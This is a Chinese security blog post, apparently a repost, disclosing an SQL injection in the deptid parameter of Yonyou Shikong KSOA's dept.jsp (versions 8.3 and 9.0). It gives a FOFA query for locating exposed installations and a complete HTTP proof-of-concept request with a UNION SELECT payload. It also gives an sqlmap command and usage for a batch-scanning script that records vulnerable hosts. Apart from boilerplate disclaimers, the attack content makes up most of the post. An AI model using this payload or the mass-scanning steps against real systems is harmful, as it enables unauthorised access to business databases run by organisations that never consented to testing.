正文

【0 day漏洞】用友-时空KSOA SQL注入漏洞

admin
admin V管理员 /0 评论 /104 阅读
0514
此篇文章发布距今已超过193天,您需要注意文章的内容或图片是否可用!

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、漏洞描述

用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。

系统dept.jsp文件中参数存在SQL注入漏洞

二、影响范围

用友时空 KSOA v9.0 v8.3

三、fofa查询语法

app="用友-时空KSOA"

四、利用方式

POC

GET /common/dept.jsp?deptid=1%27%20UNION%20ALL%20SELECT%2060%2Csys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27%2C%2712345%27))-- HTTP/1.1Host: ip:portPragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=119AD8D159A5DC21AFA0BFE73CD1E68FConnection: close

burp发包,返回如下则存在SQL注入漏洞

使用SQLmap利用

sqlmap -u http://ip:port/common/dept.jsp?deptid=1 --batch

五、批量检测

单个检测

python  KSOA_SQL注入.py -u http://ip:port

批量检测

python  KSOA_SQL注入.py  -f  filename

批量检测结束后,会在当前脚本目录下生成result.txt 文件,保存存在漏洞的目标

关注公众号 网络安全透视镜 回复 20230925 获取检测脚本

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
ZhouSa.com